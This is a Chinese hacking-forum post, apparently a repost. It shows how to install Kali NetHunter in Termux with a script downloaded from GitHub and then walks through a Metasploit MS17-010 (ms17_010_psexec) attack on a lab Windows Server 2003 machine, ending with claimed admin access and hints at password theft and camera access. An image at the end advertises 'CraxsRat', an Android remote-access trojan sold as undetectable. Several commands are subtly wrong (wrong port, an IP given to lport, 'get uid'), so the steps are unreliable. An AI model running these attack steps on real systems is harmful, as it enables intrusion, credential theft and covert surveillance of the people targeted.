转载酷安:qxqzx 查看链接
本想刷在手机上测试一下,进官网一看并没有我手机支持的版本,只有一加的型号,不过我在github上找到了一个装在termux上的Kali NetHunter
按照github上的教程很快就能安装完毕
首先更改下termux默认的源
注:Google Play 上的 Termux 已被弃用,如安装会产生兼容性问题。请通过 GitHub 或 F-Droid 来安装 Termux。
termux 运行 termux-change-repo
不出意外的话会弹出一个图形界面,按回车键选择,选中ustc或者bfsu
下载脚本
curl -LO https://raw.githubusercontent.com/Hax4us/Nethunter-In-Termux/master/kalinethunter
授予执行权限
chmod +x kalinethunter
运行脚本
./kalinethunter
如出现ssl错误,改运行
./kalinethunter –insecure
网络良好的情况下安装应该不会出什么问题
使用命令
startkali
启动nethunter。默认用户是kali,默认密码也是kali。
如果您想以 root 用户身份启动 nethunter,请使用
command startkali -r
安装完毕后,输入msfconsole启动渗透测试工具
渗透测试环节选为比较成熟的漏洞 ms17-010
靶机环境:
- OS: Windows server 2003
- 防火墙: 关闭
- IP: 192.168.1.112(445 端口转发 )
攻击机:
- OS: Mi11(Evolution Android12) Nethunter-In-Termux
- IP: 192.168.1.105
- search ms17-010
我们选择编号为1的模块
use exploit/windows/smb/ms17_010_psexec
set rhost 192.168.1.112
set rport 80
set lport 192.168.1.105
run
查看权限
get uid
可看到已经是Admin权限
ls 查看靶机文件信息
抓取密码开摄像头那些就不演示了,help查看帮助信息,测试了一下电脑端能用的手机上也能用
![表情[yiwen]-X黑手网](https://bbs.x10001.com/wp-content/themes/zibll/img/smilies/yiwen.gif)
![表情[se]-X黑手网](https://bbs.x10001.com/wp-content/themes/zibll/img/smilies/se.gif)
![【实战测试]全新CraxsRat安卓远控来袭,自带免杀不报毒-X黑手网](https://cdn.x10001.com/2024/11/20241109185149961.png)
没有回复内容